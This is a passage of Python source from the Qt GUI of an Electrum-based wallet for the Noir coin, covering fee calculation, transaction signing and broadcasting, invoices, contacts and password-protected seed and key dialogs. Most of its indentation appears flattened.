self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
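        # Illustrative example (made-up numbers): at a requested 10 sat/byte and
        # an estimated size of 226 bytes the displayed fee would be 2260 sat,
        # while the coin chooser might actually produce 2263 sat; that 3 sat
        # difference is what the fee-rounding icon reports further down.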
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
        def format(x):
            h = x.get('prevout_hash')
            return '{}...{}:{}\t{}'.format(h[0:10], h[-10:], x.get('prevout_n'), x.get('address'))
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
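    # Illustrative use of the decorator above (as done for sign_tx and
    # show_seed_dialog further down in this class):
    #
    #     @protected
    #     def some_action(self, arg, password):
    #         ...  # 'password' is supplied by request_password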
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
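    # The value returned above ends up as the 'fixed_fee' argument of
    # wallet.make_unsigned_transaction: an int is treated as an absolute fee in
    # satoshis, a callable (like the partial built from
    # estimate_fee_for_feerate) maps a tx size to a fee, and None lets the
    # wallet fall back to the fee settings in the config.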
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
                self.show_error(_('Noir Address is missing'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Noir Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
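        # set_rbf(True) signals replaceability (BIP 125), so the fee can still
        # be bumped while the transaction is unconfirmed.  The check below
        # compares the absolute fee with the server relay fee: relayfee() is
        # expressed per 1000 bytes, hence the scaling by estimated_size()/1000.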
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
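        # Signing itself runs in WaitingDialog's worker thread; on_success and
        # on_failure are then invoked on the GUI thread.  The 'tc_sign_wrapper'
        # hook lets a plugin (presumably the two-factor/TrustedCoin one) wrap
        # the success path.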
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
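            # Returns a (status, msg) pair: msg is the txid on success and a
            # human-readable error string otherwise; broadcast_done below turns
            # that pair into dialogs on the GUI thread.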
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
        # Capture the current top-level window; the override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
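    # on_pr below may be invoked from a network thread (it is the callback
    # handed to util.parse_URI), so it only emits signals; the actual GUI work
    # happens in payment_request_ok / payment_request_error above.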
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
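        # Roughly, a BIP 21 style URI such as
        #   noir:<address>?amount=0.1&label=shop&message=order%2042
        # is parsed into the 'address', 'amount', 'label' and 'message' fields
        # handled below; an 'r' parameter instead points to a BIP 70 payment
        # request, which is fetched asynchronously via on_pr.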
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
            # only show the combobox if there are multiple master public keys (e.g. multisig cosigners)
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
